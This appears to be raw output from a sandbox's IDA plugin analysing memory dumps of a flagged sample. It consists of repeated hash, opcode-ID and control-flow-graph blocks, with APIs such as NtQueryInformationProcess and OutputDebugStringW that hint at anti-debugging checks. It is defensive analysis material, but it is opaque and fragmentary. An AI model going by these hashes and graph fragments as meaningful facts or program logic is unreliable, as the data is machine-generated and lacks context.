                                                                                                  • Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: *xZ4$Te^q$Te^q$fan
                                                                                                  • API String ID: 0-1644141099
                                                                                                  • Opcode ID: fa8dd3366f5ed1d89a4326239bb1d03def8f2f7b83c1ce5b69cd199f23f1ebf5
                                                                                                  • Instruction ID: 575a4aed561d2986bd8f854c76ed809cb2b779ab26e4d52e70121dac58845b7b
                                                                                                  • Opcode Fuzzy Hash: fa8dd3366f5ed1d89a4326239bb1d03def8f2f7b83c1ce5b69cd199f23f1ebf5
                                                                                                  • Instruction Fuzzy Hash: 6DA13474E01259CFDB09CFB9C8906DEBBB2FF89304F24806AD855AB264D735A906CF51
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 192 1192430-1192463 194 119246a-11924e0 192->194 195 1192465 192->195 200 11924e3 194->200 195->194 201 11924ea-1192506 200->201 202 1192508 201->202 203 119250f-1192510 201->203 202->200 204 1192515-119252c 202->204 205 1192644-11926b6 202->205 206 1192569-1192593 202->206 207 11925c8-11925e3 202->207 208 1192598-119259c 202->208 209 11925e8-1192604 202->209 210 119252e-1192567 202->210 211 1192623-119263f 202->211 203->204 203->205 204->201 228 11926b6 call 1193d01 205->228 229 11926b6 call 11935b0 205->229 230 11926b6 call 11935a0 205->230 231 11926b6 call 1193de6 205->231 206->201 207->201 212 11925af-11925b6 208->212 213 119259e-11925ad 208->213 226 1192606 call 1192bb0 209->226 227 1192606 call 1192bc0 209->227 210->201 211->201 216 11925bd-11925c3 212->216 213->216 216->201 221 119260c-119261e 221->201 225 11926bc-11926c6 226->221 227->221 228->225 229->225 230->225 231->225
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: *xZ4$Te^q$Te^q$fan
                                                                                                  • API String ID: 0-1644141099
                                                                                                  • Opcode ID: 0111b2dc031d6b428a806cbfb8ebc2d3cd51682b8c0da205eef0fa4607a155ca
                                                                                                  • Instruction ID: 1284d791e43df548fb2456dedb753a1bf6fa0fa4c6c9ee99f0f34e34f3b4b03c
                                                                                                  • Opcode Fuzzy Hash: 0111b2dc031d6b428a806cbfb8ebc2d3cd51682b8c0da205eef0fa4607a155ca
                                                                                                  • Instruction Fuzzy Hash: D581C374E042199FDB08CFAAC994AEEFBB2FF88300F14842AD915AB358D7349905CF55
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 232 119baf0-119bb18 233 119bb1a 232->233 234 119bb1f-119bb2d 232->234 233->234 235 119bb2f-119bb41 234->235 236 119bb43 234->236 237 119bb46 235->237 236->237 238 119bb49 237->238 239 119bb50-119bb6c 238->239 240 119bb6e 239->240 241 119bb75-119bb76 239->241 240->238 240->241 242 119bcb9-119bcd7 240->242 243 119bb9b-119bc18 call 119c048 call 119c920 240->243 244 119bd9b-119bda7 call 119b140 240->244 245 119bb7b-119bb99 240->245 246 119bcdc-119bce2 call 119b134 240->246 247 119bedf-119bee4 call 119cd98 240->247 248 119bebf-119bedd 240->248 249 119be90 240->249 250 119be13-119be20 call 119b14c 240->250 251 119bdd3-119bde0 240->251 252 119bc35-119bc49 240->252 253 119bef4 240->253 254 119be57-119be75 240->254 255 119be77-119be7c 240->255 256 119be28 240->256 257 119bd2b-119bd2f 240->257 258 119bc4e-119bc60 call 119caf0 240->258 259 119bd62 240->259 241->250 242->239 312 119bc1e-119bc30 243->312 289 119bda9-119bdb8 244->289 290 119bdba-119bdc1 244->290 245->239 271 119bce7-119bcf8 246->271 284 119beea-119bef2 247->284 265 119be97-119beb3 248->265 249->265 286 119be7e-119be8e 250->286 291 119bdf3-119bdfa 251->291 292 119bde2-119bdf1 251->292 252->239 262 119be2f-119be4b 254->262 255->286 256->262 263 119bd31-119bd40 257->263 264 119bd42-119bd49 257->264 297 119bc66-119bc86 258->297 277 119bd68-119bd6f 259->277 272 119be4d 262->272 273 119be54-119be55 262->273 276 119bd50-119bd5d 263->276 264->276 279 119bebc-119bebd 265->279 280 119beb5 265->280 299 119bd0b-119bd12 271->299 300 119bcfa-119bd09 271->300 272->247 272->248 272->249 272->253 272->254 272->255 272->256 272->273 273->255 276->239 287 119bd71-119bd80 277->287 288 119bd82-119bd89 277->288 279->253 280->247 280->248 280->249 280->253 280->279 284->265 286->247 286->249 296 119bd90-119bd96 287->296 288->296 298 119bdc8-119bdce 289->298 290->298 293 119be01-119be0e 291->293 292->293 293->239 296->239 305 119bc88-119bc9a 297->305 306 119bca0-119bcb4 297->306 298->239 303 119bd19-119bd26 299->303 300->303 303->239 305->306 306->239 312->239
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Q4I$Q4I
                                                                                                  • API String ID: 0-3560053718
                                                                                                  • Opcode ID: c7bff6d0f1a41c0fb1454591660beacc6e3e19d5e80d6b3cad7b4ec7d7008634
                                                                                                  • Instruction ID: c153d4c9d0e538cb12b299bfcfa2626ef4d84611da981ed0046bc1540ce47b35
                                                                                                  • Opcode Fuzzy Hash: c7bff6d0f1a41c0fb1454591660beacc6e3e19d5e80d6b3cad7b4ec7d7008634
                                                                                                  • Instruction Fuzzy Hash: DAB15C70D18228CFDF18CFA5E584A9DBBB1FF49304F108569D52ABB254DB389941CF1A
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 317 119b0bc-119b7bd NtQueryInformationProcess 320 119b7bf-119b7c5 317->320 321 119b7c6-119b7fc 317->321 320->321
                                                                                                  APIs
                                                                                                  • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 0119B7AD
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InformationProcessQuery
                                                                                                  • String ID:
                                                                                                  • API String ID: 1778838933-0
                                                                                                  • Opcode ID: 16c7e6f24e8e069c58cb1472669cad9e6558f37a868e3da4e9b608e0a9cf9c8f
                                                                                                  • Instruction ID: 894ab056dd8b5ec1182ff305cc536381619ee47695018d7885da1070abb0a522
                                                                                                  • Opcode Fuzzy Hash: 16c7e6f24e8e069c58cb1472669cad9e6558f37a868e3da4e9b608e0a9cf9c8f
                                                                                                  • Instruction Fuzzy Hash: 5C4168B9D04258DFCF14CFA9E984A9EFBB1BB19310F10902AE824B7310D335A945CF69
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 396 1199f88-1199fa2 397 1199fa9-119a009 396->397 398 1199fa4 396->398 403 119a00f 397->403 404 119a0f1-119a101 397->404 398->397 405 119a016-119a032 403->405 404->405 406 119a03b-119a03c 405->406 407 119a034 405->407 409 119a041-119a07f call 119b858 406->409 410 119a194-119a1d5 call 119b9d0 406->410 407->403 407->404 407->409 407->410 411 119a129-119a161 407->411 412 119a0b2 call 119af78 407->412 413 119a106-119a124 407->413 433 119a081-119a090 409->433 434 119a092-119a099 409->434 435 119a1db-119a1e1 410->435 428 119a163-119a172 411->428 429 119a174-119a17b 411->429 414 119a0b8-119a0c5 412->414 413->405 419 119a0d8-119a0df 414->419 420 119a0c7-119a0d6 414->420 421 119a0e6-119a0ec 419->421 420->421 421->405 430 119a182-119a18f 428->430 429->430 430->405 436 119a0a0-119a0ad 433->436 434->436 436->405
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: ELd
                                                                                                  • API String ID: 0-357188618
                                                                                                  • Opcode ID: 775cde1e71174116ad289a4c90ea2ebc899c06e815a91ac96667a9bac419af33
                                                                                                  • Instruction ID: 816ca5ba080f08a4b7e85eafa0727cb7a13bfd85d22448b559fe22fbe7a9b82f
                                                                                                  • Opcode Fuzzy Hash: 775cde1e71174116ad289a4c90ea2ebc899c06e815a91ac96667a9bac419af33
                                                                                                  • Instruction Fuzzy Hash: E861F4B4D00208DFDB08DFA9E58969DBBB2FF88301F14C06AD416AB354DB345A45CF11
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 440 1199f77-1199fa2 441 1199fa9-119a009 440->441 442 1199fa4 440->442 447 119a00f 441->447 448 119a0f1-119a101 441->448 442->441 449 119a016-119a032 447->449 448->449 450 119a03b-119a03c 449->450 451 119a034 449->451 453 119a041-119a07f call 119b858 450->453 454 119a194-119a1d5 call 119b9d0 450->454 451->447 451->448 451->453 451->454 455 119a129-119a161 451->455 456 119a0b2 call 119af78 451->456 457 119a106-119a124 451->457 477 119a081-119a090 453->477 478 119a092-119a099 453->478 479 119a1db-119a1e1 454->479 472 119a163-119a172 455->472 473 119a174-119a17b 455->473 458 119a0b8-119a0c5 456->458 457->449 463 119a0d8-119a0df 458->463 464 119a0c7-119a0d6 458->464 465 119a0e6-119a0ec 463->465 464->465 465->449 474 119a182-119a18f 472->474 473->474 474->449 480 119a0a0-119a0ad 477->480 478->480 480->449
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: ELd
                                                                                                  • API String ID: 0-357188618
                                                                                                  • Opcode ID: d997543e6f86b4f060122962ae6b06cd625622b21c5f361e0d1ba0ce64f78aa9
                                                                                                  • Instruction ID: 8676969e7860e1fabfe7305a64e8874a8ee38df4c1be468d5b7ee3b1fd3b8897
                                                                                                  • Opcode Fuzzy Hash: d997543e6f86b4f060122962ae6b06cd625622b21c5f361e0d1ba0ce64f78aa9
                                                                                                  • Instruction Fuzzy Hash: F361E7B4E01208DFDB48CFA5E59969DBBB2FF88301F14C46AD816AB354DB385A45CF11
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 541 1196d08-1196d29 542 1196d2b 541->542 543 1196d30-1196da7 541->543 542->543 545 1196da9 543->545 546 1196db0-1197781 call 1192440 543->546 545->546 549 1197786-11977a4 546->549
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: p
                                                                                                  • API String ID: 0-2181537457
                                                                                                  • Opcode ID: cdf1f22a3755303beb94ab7708d7837b122962a9dad85130ddecc77a57524134
                                                                                                  • Instruction ID: 3ad443515f3854e6fb8ae3d75bda838359fba7601b41060266f4d46111b15854
                                                                                                  • Opcode Fuzzy Hash: cdf1f22a3755303beb94ab7708d7837b122962a9dad85130ddecc77a57524134
                                                                                                  • Instruction Fuzzy Hash: 3521A871E016189BEB5CCFABD94069EFBF7AFC8200F04C1B6D518A6264EB3419468F51
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 37642a6876ed76f4e8fa9ce062e8b7861a7c067ebfb64e1603bbe4c808cf5d0b
                                                                                                  • Instruction ID: 87acb3c6b75a076de21a9a88ed92fcb8820e9d5f2bd884d8a265abdb6b291e4c
                                                                                                  • Opcode Fuzzy Hash: 37642a6876ed76f4e8fa9ce062e8b7861a7c067ebfb64e1603bbe4c808cf5d0b
                                                                                                  • Instruction Fuzzy Hash: EBC15A70D0520ADFDB08CFA9D5814AEFBB2FF89300B14D56AD426AB614E734E942CF91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d462802236691dc416fdf68815d637a9d39c5cc0537f3cd6509f6bfbe1165df1
                                                                                                  • Instruction ID: bb32bec0cf5ea8ae1540ec4f99b5a401b74c43209be1d1c1d2a44d30dfbec593
                                                                                                  • Opcode Fuzzy Hash: d462802236691dc416fdf68815d637a9d39c5cc0537f3cd6509f6bfbe1165df1
                                                                                                  • Instruction Fuzzy Hash: D2C13870D0520ADFDF08CFA6D5818AEFBB2FF89340B14D529D426AB614E734A942CF95
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b87f9dc8eb0ac0dc31d0e60c0c7fdebce9338d119089af5fba96d1225a6f9981
                                                                                                  • Instruction ID: 265d35aff44c47b80398caaf35f9c4a4b140dd069a784311ebcb11d074606199
                                                                                                  • Opcode Fuzzy Hash: b87f9dc8eb0ac0dc31d0e60c0c7fdebce9338d119089af5fba96d1225a6f9981
                                                                                                  • Instruction Fuzzy Hash: 57A14970D0520ADFDF08CF99D5818AEFBB2FF89340B159556D426AB614E334D942CF91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e13797ac352e273c0315c91ea2745c7a55b53ee6b0f73807d4a2a35d7bf8a54b
                                                                                                  • Instruction ID: 2737279b9e55c9e885183308640b218fdbccc03e9f7f313f91a41bc9549b4fa5
                                                                                                  • Opcode Fuzzy Hash: e13797ac352e273c0315c91ea2745c7a55b53ee6b0f73807d4a2a35d7bf8a54b
                                                                                                  • Instruction Fuzzy Hash: BEA13870D0520ADFDF08CFA5D6818AEFBB2FF49340B159525D426AB614E334E982CF95
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: fde4709e2955d735500fa4bba2028498877a12695f07c1f0030b446616c78c58
                                                                                                  • Instruction ID: 872afeeab34c8bda29d5cac1dc80e7821bd3d295a38a986d5000c3ce9bc1b207
                                                                                                  • Opcode Fuzzy Hash: fde4709e2955d735500fa4bba2028498877a12695f07c1f0030b446616c78c58
                                                                                                  • Instruction Fuzzy Hash: 8DA11770E0520ADFDF08CFA5D2814AEFBB2FF89340B159526D526AB614E334E942CF95
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 69caed56058dbc9c841c256b4f504991c3785b44d9d825cde2b1e4eabade4749
                                                                                                  • Instruction ID: bb65cc44db3591f3d78032ff08948bf0a54b17b06592eedee688488138fde14b
                                                                                                  • Opcode Fuzzy Hash: 69caed56058dbc9c841c256b4f504991c3785b44d9d825cde2b1e4eabade4749
                                                                                                  • Instruction Fuzzy Hash: 2DA117B0D0520ADFDF08CF95D2818AEFBB2FF49340B159526D426AB614E334E982CF95
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 64b1eb97a4a7b10c313b0ec08c614002d5c3ea6eba0db3089b380c7291004e80
                                                                                                  • Instruction ID: 7b24689a0636e872953c64ee802baba3a3cd55f01d659763d3ba82920a715bac
                                                                                                  • Opcode Fuzzy Hash: 64b1eb97a4a7b10c313b0ec08c614002d5c3ea6eba0db3089b380c7291004e80
                                                                                                  • Instruction Fuzzy Hash: 5E511870E04619CBDF18CFA9D9409DDFBB6FF89300F24862AD529A7214EB70A946CF45
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: cd78f2c9ad4909cde902074ead80ff5a1708a396634801e5425b28d4d9c29351
                                                                                                  • Instruction ID: 5e892e69431145d0bcece8dbb6cfdc5871827db9633240c5d9a23f5986d53932
                                                                                                  • Opcode Fuzzy Hash: cd78f2c9ad4909cde902074ead80ff5a1708a396634801e5425b28d4d9c29351
                                                                                                  • Instruction Fuzzy Hash: FC5116B4E056099FDB08CFAAD5416AEFBF2EF8C310F24D02AD419B7254D7349A41CBA5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 826e54fdf8852cec7e6590e59669595f25a132b7779c6275584e862b5aaef02f
                                                                                                  • Instruction ID: 98261a2bb9d71b37394dece25735ed43df4234aa5e38c64f7924589bc924b1b3
                                                                                                  • Opcode Fuzzy Hash: 826e54fdf8852cec7e6590e59669595f25a132b7779c6275584e862b5aaef02f
                                                                                                  • Instruction Fuzzy Hash: D05119B4E05609DFDB08CFAAD4416AEFBF2EF8C300F14D02AD419B7254D7349A418BA9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 74fb0384bb4e415ef3f603369763a62de02b4857f7e99b61eeec438b45840b56
                                                                                                  • Instruction ID: 4e3be6cc29cdbdba6760b6dc0a5d4138bb158cb43f0d9737372d34d695baad9c
                                                                                                  • Opcode Fuzzy Hash: 74fb0384bb4e415ef3f603369763a62de02b4857f7e99b61eeec438b45840b56
                                                                                                  • Instruction Fuzzy Hash: 0B31D5B1E006188BEB18CFAAD8447DEBBB7AFC9310F14C06AD419A7258DB355A45CF50
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 61cc50d882050423941cd2f7e16a314279591b59bfccc4d8a2693dd781dcc212
                                                                                                  • Instruction ID: 2f321314b9f01d9b2c4672431772a1e57b22e6f44b8fba7ad8777e2a33f7e177
                                                                                                  • Opcode Fuzzy Hash: 61cc50d882050423941cd2f7e16a314279591b59bfccc4d8a2693dd781dcc212
                                                                                                  • Instruction Fuzzy Hash: 1721B6B1E006189BEB18CFABD94439EBFF3AFC8310F14C16AD418AA258DB7919458F51
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 324 119b134-119cbd1 327 119cbd3-119cbe2 324->327 328 119cbe5-119cc22 OutputDebugStringW 324->328 327->328 329 119cc2b-119cc59 328->329 330 119cc24-119cc2a 328->330 330->329
                                                                                                  APIs
                                                                                                  • OutputDebugStringW.KERNEL32(?), ref: 0119CC12
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DebugOutputString
                                                                                                  • String ID:
                                                                                                  • API String ID: 1166629820-0
                                                                                                  • Opcode ID: 8fc04cce30bac524afe316306bbc98281b767f9855530d8a9c0e07665727f850
                                                                                                  • Instruction ID: d26e7e02577a2e7c13da4e5bf3d3eedbf7033206c451dcf27c5b1bc96d360c81
                                                                                                  • Opcode Fuzzy Hash: 8fc04cce30bac524afe316306bbc98281b767f9855530d8a9c0e07665727f850
                                                                                                  • Instruction Fuzzy Hash: B331A7B4D002489FCF18CFAAD584A9EFBF5AB49310F14906AE859B7220D734A945CFA4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1661325758.000000000105D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0105D000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_105d000_SecuriteInfo.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2d590e40ef2d9e202e08674cdd61ed9a9a7e381bc33e06bcafd66f4137312b32
                                                                                                  • Instruction ID: 3ec091a1e7beceb1c8b6008f0db979966a0a6d8d7ebe6caebbfb79464ebb2b42
                                                                                                  • Opcode Fuzzy Hash: 2d590e40ef2d9e202e08674cdd61ed9a9a7e381bc33e06bcafd66f4137312b32
                                                                                                  • Instruction Fuzzy Hash: 05213671100200EFDB45DF94D9C4B1BBFA5FB88314F20C2AAED490B256C33AC456CBA2
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1661325758.000000000105D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0105D000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_105d000_SecuriteInfo.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f951bf4bb187db7cddbbb45333787baf1bee5240b54e57363625a9f9ae4dd012
                                                                                                  • Instruction ID: 4f2d2616707b5bb1079ec48d39dbf9e5632c59a42d5e78f7315065888e19dc47
                                                                                                  • Opcode Fuzzy Hash: f951bf4bb187db7cddbbb45333787baf1bee5240b54e57363625a9f9ae4dd012
                                                                                                  • Instruction Fuzzy Hash: 262103B1500200DFDB45DF98D9C4B2BBFA5FB98318F2085AAED490B256C336D456C7B1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1661379702.000000000106D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0106D000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_106d000_SecuriteInfo.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b0ada7b5c5c954ccded0234ca02b15114d4001409e658268f7bfbab25c691bc4
                                                                                                  • Instruction ID: c1cf83deafcb9250712db26d1834a892517345a627e47a87c2b1e33b25c375a2
                                                                                                  • Opcode Fuzzy Hash: b0ada7b5c5c954ccded0234ca02b15114d4001409e658268f7bfbab25c691bc4
                                                                                                  • Instruction Fuzzy Hash: 3021F2B1604204DFDB05DF98D9C0B2ABBA9EB84314F24C5ADD8C94B256C37AD446CB61
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1661379702.000000000106D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0106D000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_106d000_SecuriteInfo.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e72f9cebe68806f0e2e4022c855a52ff52eb1f2f32f22fb7309d12cc0b26ef80
                                                                                                  • Instruction ID: ba2ba8d658a6f8d0b7acb37511c9e1cd3891788ceec671edd351b7fd2f637600
                                                                                                  • Opcode Fuzzy Hash: e72f9cebe68806f0e2e4022c855a52ff52eb1f2f32f22fb7309d12cc0b26ef80
                                                                                                  • Instruction Fuzzy Hash: 3D212571604200DFEB15DF58D584B26BFA9EB84314F20C5ADE9C94B256C337D447CB61
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1661379702.000000000106D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0106D000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_106d000_SecuriteInfo.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ffe0e6ff06409d33a3a9d8136f76f66a7aac57eee0d47f83bb1a5666a8e912e0
                                                                                                  • Instruction ID: 5ad7dc7ec989b58cb3a40b9f89e4aedbb1f847dfa6dc446015163a649e0a5bee
                                                                                                  • Opcode Fuzzy Hash: ffe0e6ff06409d33a3a9d8136f76f66a7aac57eee0d47f83bb1a5666a8e912e0
